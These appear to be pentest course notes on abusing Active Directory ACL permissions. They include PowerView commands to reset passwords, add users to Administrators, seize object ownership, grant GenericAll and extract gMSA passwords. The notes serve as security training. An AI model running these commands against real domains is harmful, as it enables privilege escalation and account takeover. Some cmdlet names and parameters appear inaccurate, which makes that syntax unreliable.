16.Access Control List (ACL) Abuse Primer

Active Directory Users and Computers (ADUC)

ADUC is a graphical tool used to view and manage ACLs within Active Directory. While it does not involve command-line instructions, it is essential for visualizing permissions.

BloodHound

BloodHound is a powerful graphical tool used for analyzing AD relationships and identifying potential attack paths, including ACL abuse. It utilizes graph theory and ingestors to collect data from Active Directory, mapping privilege escalation opportunities.

PowerView (PowerShell)

PowerView is a PowerShell framework designed for enumerating and exploiting Active Directory. Below are key actions that can be performed using PowerView cmdlets:

  • Enumerating Access Control Entries (ACEs).

  • Identifying abusable permissions such as:

    • ForceChangePassword

    • GenericWrite

    • AddSelf

    • GenericAll

    • WriteOwner

    • WriteDACL

    • AllExtendedRights

  • Identifying extended rights, such as:

    • Unexpire-Password

    • Reanimate-Tombstones

  • Enumerating Group Managed Service Account (gMSA) permissions. ![[Pasted image 20250312104643.png]]

Key PowerShell Cmdlets for ACL Abuse

Changing a User's Password

If the ForceChangePassword permission is granted, an attacker can reset a user's password:

Set-DomainUserPassword -Identity "username" -NewPassword (ConvertTo-SecureString "NewP@ssword123" -AsPlainText -Force)

Adding a User to a Group

If an attacker has Add Members or AddSelf permission, they can add a user to a privileged group:

Add-DomainGroupMember -Identity "Administrators" -Members "username"

Modifying Domain Objects

If GenericWrite permission is granted, an attacker can modify attributes of domain objects:

Set-DomainObject -Identity "CN=User,DC=domain,DC=com" -Set @{'description'='Compromised'}

Changing Object Ownership

If WriteOwner permission is available, an attacker can assign ownership to themselves:

Set-DomainObjectOwner -Identity "CN=User,DC=domain,DC=com" -Owner "Attacker"

Modifying Object DACLs

If WriteDACL permission is available, an attacker can modify permissions:

Add-DomainObjectACL -TargetIdentity "CN=Admin,DC=domain,DC=com" -PrincipalIdentity "Attacker" -Rights "GenericAll"

Extracting gMSA Passwords

Attackers with necessary permissions can extract Group Managed Service Account (gMSA) passwords:

Get-GMSAPassword -Identity "gmsa_account"

Advanced PowerView Enumeration Commands

Enumerating ACLs on a User

Get-ObjectAcl -Identity "username"

Finding Users with ForceChangePassword Permissions

Get-ObjectAcl -Identity "domain" -SearchBase "DC=domain,DC=com" -SearchScope Subtree | 
?{$_.ActiveDirectoryRights -contains "WriteProperty" -and $_.IdentityReference -match "user"} |
select IdentityReference, ActiveDirectoryRights

Identifying Groups a User Can Add Themselves To

Find-InterestingDomainAcl -Identity "username" -Rights "WriteProperty" -Properties "member"

Finding Users with GenericAll Permissions

Get-ObjectAcl -Identity "domain" -SearchBase "DC=domain,DC=com" -SearchScope Subtree | 
?{$_.ActiveDirectoryRights -contains "GenericAll" -and $_.IdentityReference -match "user"} |
select IdentityReference, ActiveDirectoryRights
Previous7.An ACE in the HoleNext17. ACL Enumeration

Last updated